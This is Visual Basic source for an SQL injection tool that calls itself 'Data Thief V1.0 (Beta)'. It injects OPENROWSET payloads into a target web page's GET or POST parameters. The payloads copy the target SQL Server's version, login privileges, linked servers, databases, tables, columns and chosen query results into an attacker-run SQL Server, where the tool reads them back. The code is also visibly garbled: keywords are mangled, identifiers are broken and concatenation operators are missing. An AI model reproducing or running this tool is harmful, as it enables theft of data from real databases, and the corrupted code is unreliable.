Option expedition
DIM URL AS STRING
Dim PostData As String
Dim Method As String
Private sub cbomethod_click ()
IF cbomethod.listindex the
TXTPOSTDATA.ENABLED = TRUE
Else
TXTPOSTDATA.ENABLED = FALSE
END IF
End Sub
Private sub cmdgo_click ()
DIM DATABASES_INJECTION_STR AS STRING
DIM Servers_Injection_Str As String
DIM VERSION_INJECTION_STR AS STRING
ON Error Goto DisplayError
IF txturl.text <> "" ""
IF (cbethod.text = "post" and txtpostdata.text <> "") or (cbethod.text = "get") THEN
DATABASES_INJECTION_STR = "insert into openrowset ( 'sqloledb', 'Network = DBMSSOCN; Address =" TxtServer.Text "," TxtPort.Text "; uid =" TxtLogin.Text "; pwd =" TxtPassword. TEXT "',' Select * from ## Databases') Select Name from master.dbo.sdatabases -"
SERVERS_INJECTION_STR = "insert into openrowset ( 'sqloledb', 'Network = DBMSSOCN; Address =" TxtServer.Text "," TxtPort.Text "; uid =" TxtLogin.Text "; pwd =" TxtPassword. Text "',' Select * from ## servers') Select srvname from master.dbo.sysservers -"
VERSION_INJECTION_STR = "insert into openrowset ( 'sqloledb', 'Network = DBMSSOCN; Address =" TxtServer.Text "," TxtPort.Text "; uid =" TxtLogin.Text "; pwd =" TxtPassword. Text ", 'Select * from ## version') SELECT @@ version union all select 'login name:'% 2b SUSER_SNAME ()% 2B char (13)% 2B 'user name:'% 2b user% 2B char N (13)% 2B 'is db_owner:'% 2B Convert (varchar (1), is_member ('db_owner'))% 2B char (13)% 2b 'is sysadmin:'% 2b Convert (varchar (1), is_srvrolemember ( 'sysadmin')) - "ClearLists
Connect txtserver.text, txtLogin.text, txtpassword.text, txtport.text
CreateTables
Setvars
Submitinjection URL, Method, PostData, Databases_Injection_Str
Setvars
Submitinjection URL, Method, PostData, Servers_Injection_Str
Setvars
Submitinjection URL, Method, PostData, Version_Injection_Str
Getversion
GetServers
GetDatabases
Else
Msgbox "Please, Input the Post Data Value"
END IF
Else
Msgbox "please, input the url value"
END IF
EXIT SUB
DisplayError:
MsgBox Err.Description
End Sub
Private subdlistfields_click ()
Dim Fields_Injection_Str As String
ON Error Goto DisplayError
If LSTTABLES.LIST (LSTTABLES.LISTINDEX) <> "" "
FIELDS_INJECTION_STR = "insert into openrowset ( 'sqloledb', 'Network = DBMSSOCN; Address =" TxtServer.Text "," TxtPort.Text "; uid =" TxtLogin.Text "; pwd =" TxtPassword. Text " ',' select * from ## fields ') select name from" LstDatabases.List (LstDatabases.ListIndex) ".dbo.syscolumns where id = object_id ('" LstDatabases.List (LstDatabases.ListIndex) ".." LSTTABLES.LIST (LSTTABLES.LISTINDEX) ") -" setvars
TXTQUERY.TEXT = "SELECT"
SubmitInjection URL, Method, PostData, Fields_Injection_Str
Getfields
Else
Msgbox "please, select a table"
END IF
EXIT SUB
DisplayError:
MsgBox Err.Description
End Sub
Private sub cmdlisttables_click ()
DIM TABLES_INJECTION_STR AS STRING
ON Error Goto DisplayError
If LSTDATABASES.LIST (LSTDATABASES.LISTINDEX) <> ""
If Chksystables
TABLES_INJECTION_STR = "insert into openrowset ( 'sqloledb', 'Network = DBMSSOCN; Address =" TxtServer.Text "," TxtPort.Text "; uid =" TxtLogin.Text "; pwd =" TxtPassword. Text ", 'Select * from ## Tables') Select Name from" LSTDATABASES.LIST (LSTDATABASES.LISTINDEX) ".dbo.sysobjects where xtype = 'u' or type = 's' -"
Else
TABLES_INJECTION_STR = "insert into openrowset ( 'sqloledb', 'Network = DBMSSOCN; Address =" TxtServer.Text "," TxtPort.Text "; uid =" TxtLogin.Text "; pwd =" TxtPassword. TEXT "',' Select * from ## Tables') Select Name from" LSTDATABAS.LIST (LSTDATABAS.LISTINDEX) ".dbo.sysObjects where xtype = 'u' -" END IF
Setvars
Lstfields.clear
TXTQUERY.TEXT = "SELECT"
SubmitInjection URL, Method, PostData, Tables_INJECTION_STR
GetTables
Else
Msgbox "please, select a database"
END IF
EXIT SUB
DisplayError:
MsgBox Err.Description
End Sub
Private subdrunQuery_click ()
Dim Fields as string
DIM Query As String
DIM Query_INJECTION_STR AS STRING
ON Error Goto DisplayError
IF txtQuery.text <> "select" then
Setvars
Fields = Left (txtQuery.text, len (txtQuery) - 1)
Fields = Replace (Fields, "SELECT", "")
Query = "SELECT TOP" TXTMAXROWS.TEXT " Fields " from " LSTDATABAS.LIST (LSTDATABAS.LISTINDEX) " .dbo. " LSTTables.List (Lstttables.listIndex)
CreateTableResults Fields
QUERY_INJECTION_STR = "insert into openrowset ( 'sqloledb', 'Network = DBMSSOCN; Address =" TxtServer.Text "," TxtPort.Text "; uid =" TxtLogin.Text "; pwd =" TxtPassword. TEXT "',' SELECT * from ## TableResults')" query "-"
SubmitinJection URL, Method, PostData, Query_Injection_Str
GetResults
Else
Msgbox "please, select one or more fields" Endiff
EXIT SUB
DisplayError:
MsgBox Err.Description
End Sub
Private sub flow_load ()
Cbethod.listIndex = 0
End Sub
Private Sub Form_Unload (Cancel AS Integer)
ON Error Goto DisplayError
Disconnect
End
EXIT SUB
DisplayError:
MsgBox Err.Description
End Sub
Private sublstfields_ItemCheck (item as integer)
ON Error Goto DisplayError
IF INSTR (1, TXTQUERY.TEXT, "from", vbtextcompare) THEN
TXTQUERY.TEXT = Replace (txtQuery.text, "from" lstDatabases.list (lstDatabases.listindex) ".dbo." LSTTables.List (Lstttables.ListIndex), "")
TXTQUERY.TEXT = TXTQUERY.TEXT ","
END IF
If Lstfields.Selected (item) THEN
TXTQUERY.TEXT = TXTQUERY.TEXT LSTFIELDS.LIST (Item) ","
Else
TXTQUERY.TEXT = Replace (txtQuery.Text, Lstfields.List (item) "", "")
END IF
EXIT SUB
DisplayError:
MsgBox Err.Description
End Sub
Private sub coplearlists ()
LstlinkedServer.clear
LstdataBases.clear
LSTTables.clear
Lstfields.clear
End Sub
Private sub setvars ()
URL = TXTURL.TEXT
PostData = txtpostdata.text
Method = cbomethod.text
End Sub
Private sub txtmaxrows_keypress (Keyascii AS Integer)
IF not isnumeric (chr (keyascii)) and keyascii <> 8 THEN
Keyascii = 0
END IF
End Sub
Private sub txtport_KeyPress (Keyascii As Integer)
IF not isnumeric (chr (keyascii)) and keyascii <> 8 THEN
Keyascii = 0
END IF
End Sub
Option expedition
Const user_agent = "Data Thief V1.0 (Beta)"
Dim Con as new adodb.connection
'Open the url subsmity the data
Public Sub OpenURL (URL As String, Method As String, PostData AS String)
DIM HTTPPARSER AS New XMLHTTPURL = Replace (URL, "", "% 20")
If Method = "get" then
Httpparser.Open Method, URL, FALSE
Httpparser.SetRequestHeader "User-agent", user_agent
Httpparser.send
Else
PostData = Replace (PostData, ","% 20 ")
Httpparser.Open Method, URL, FALSE
Httpparser.SetRequestHeader "User-agent", user_agent
Httpparser.SetRequestHeader "Content-Type", "Application / X-WWW-FORM-URLENCODED"
Httpparser.send (PostData)
END IF
FRMHTML.TXTHTML.TEXT = httpparser.responsetext
FRMHTML.WindowState = 1
FRMHTML.SHOW
Set httpparser = Nothing
End Sub
'Get the servers name from temporary table
Public Sub GetServers ()
DIM REC AS New Adod.Recordset
Rec.activeConnection = con
Rec.open "SELECT NAME FROM ## Servers"
Frmmain.lstlinkedServer.clear
Do While Not Rec.eof
Frmmain.lstlinkedServer.AddItem Rec.fields (0)
Rec.movenext
Loop
Rec.close
End Sub
'Get the databases name from Temporary Table
Public Sub getDatabases ()
DIM REC AS New Adod.Recordset
Rec.activeConnection = con
Rec.open "SELECT NAME FROM ## Databases"
Frmmain.lstdatabases.clear
Do While Not Rec.eof
Frmmain.lstdatabases.addItem Rec.fields (0)
Rec.movenext
Loop
Rec.close
End Sub
'Get the Tables Names from Temporary Table
Public Sub gettables ()
DIM REC AS New Adod.Recordset
Rec.activeConnection = con
Rec.open "Select Name from ## Tables",,, AdlockOptimistic
Frmmain.lsttables.clear
Do While Not Rec.eof
Frmmain.lsttables.additem Rec.fields (0)
Rec.delete
Rec.movenext
Loop
Rec.close
End Sub
'Get the fields name from temporary table
Public Sub getfields ()
Dim Rec as new adod.com.recordsetrec.activeConnection = con
Rec.open "SELECT NAME FROM ## Fields",,, AdlockOptimistic
Frmmain.lstfields.clear
Do While Not Rec.eof
Frmmain.lstfields.addItem Rec.fields (0)
Rec.delete
Rec.movenext
Loop
Rec.close
End Sub
'Get The SQL Server Version from Temporary Table
Public sub getversion ()
DIM REC AS New Adod.Recordset
DIM I as integer
Rec.activeConnection = con
Rec.open "SELECT * from" ## version "
Frmmain.txtOutput.text = ""
IF not rec.eof then
Frmmain.txtOutput.text = Rec.fields (0) .Name
FRMMAIN.TXTOUTPUT.TEXT = frmmain.txtOutput.text VBCRLF VBCRLF Rec.getstring
END IF
Rec.close
End Sub
'Get the results of the query from temporary TABLE
Public Sub getResults ()
DIM REC AS New Adod.Recordset
DIM I as integer
Rec.activeConnection = con
Rec.open "Select * from ## TableResults"
Frmmain.txtOutput.text = ""
For i = 0 to Rec.fields.count - 1
FRMMain.txtOutput.text = frmmain.txtOutput.text Rec.fields (i) .Name VBTAB
Next I
IF not rec.eof then
FRMMAIN.TXTOUTPUT.TEXT = frmmain.txtOutput.text VBCRLF VBCRLF Rec.getstring
END IF
Rec.close
End Sub
Public Sub Connect (Server AS String, Uid As String, PWD AS String, Port As String)
If Con = "" THEN
Con.comtring = "provider = sqloledb; network = dbmssocn; address =" server "," port "; uid =" uid "; PWD =" PWD ";"
CON.CONNECTIONTIMEOUT = 10
Con.open
END IF
End Sub
Public Sub Disconnect ()
IF Con <> "" THEN CON.CLOSE
Set con = Nothing
End Sub
'Create Temporary Tables to Hold The Data
Public Sub CreateTables ()
DIM REC AS New Adod.Recordset
Rec.activeConnection = con
Rec.open "if Object_id ('Tempdb .. ## Version') Is Not Null Drop Table ## Version"
Rec.open "CREATE TABLE ## Version (Version Varchar (500))"
Rec.open "if Object_id ('Tempdb .. ## Servers') is not null Drop Table ## Servers
Rec.open "CREATE TABLE ## Servers (Name Varchar (128))"
Rec.open "if Object_id ('Tempdb .. ## Databases') Is Not Null Drop Table ## databases"
Rec.open "CREATE TABLE ## Databases (Name Varchar (128))"
Rec.open "if Object_id ('Tempdb .. ## Tables') is not null Drop Table ## TABLES
Rec.open "CREATE TABLE ## Tables (Name Varchar (128))"
Rec.open "if Object_id ('Tempdb .. ## fields') is not null drop table ## fields
Rec.open "Create Table ## fields (Name Varchar (128))"
End Sub
'Create a Temporary Table to Hold Query Results
Public Sub CreateTableResults (Fields as String)
DIM REC AS New Adod.Recordset
Dim string () AS STRING
DIM Query As String
DIM I as byte
Strarray = Split (Fields, ",")
Query = "CREATE TABLE ## TableResults ("
IF ubound (strARRAY) = 0 THEN
Query = query strrray (0) "SQL_VARIANT" "
Else
For i = 0 to Ubound (strARRAY)
'Comment this if SQL Server 7
Query = Query Strarray (i) "SQL_VARIANT,"
'UNComment this if SQL Server 7
'Query = query strarray (i) "VARCHAR (8000),"
Next I
Query = Left (Query, Len (Query) - 1) ")"
END IF
Rec.activeConnection = con
Rec.open "if Object_id ('Tempdb .. ## TableResults') is not null drop table ## TableResults" Rec.Open Query
End Sub
'Submit Data
Public Sub SubmitinJection (URL AS String, Method As String, PostData As String, Injectionstr As String)
If Method = "Post" then
PostData = Replace (PostData, "<***>", INJECTIONSTR)
OpenURL URL, Method, PostData
Else
URL = Replace (URL, "<***>", INJECTIONSTR)
OpenURL URL, Method, PostData
END IF
End Sub
